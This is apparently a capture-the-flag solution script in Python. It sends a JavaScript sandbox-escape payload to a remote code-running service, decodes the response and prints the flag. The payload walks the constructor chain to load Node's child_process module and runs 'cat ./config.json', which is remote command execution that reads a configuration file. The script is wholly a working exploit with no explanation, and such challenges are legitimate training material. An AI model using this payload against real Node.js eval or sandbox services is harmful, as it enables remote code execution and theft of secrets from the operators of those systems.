#!/usr/bin/python

import urllib.request
import urllib.parse
import json

class Payload(object):
    def __init__(self, j):
        self.__dict__ = json.loads(j)
    def get(self, key):
        return self.__dict__[key]

code = 'new Function("return (this.constructor.constructor(\'return (this.process.mainModule.constructor._load)\')())")()("child_process").execSync("cat ./config.json")'
url = "http://whale.hacking-lab.com:3000/run"
data = urllib.parse.urlencode({"run": code}).encode()
request = urllib.request.Request(url, data=data)
response = urllib.request.urlopen(request).read()

p = Payload(response)
result = p.get("result")

indexStart = result.find("[") + 1
indexEnd = result.find("]")
result = ''.join([chr(int(x.strip())) for x in result[indexStart:indexEnd].split(",")])

p = Payload(result)
print(p.get("flag"))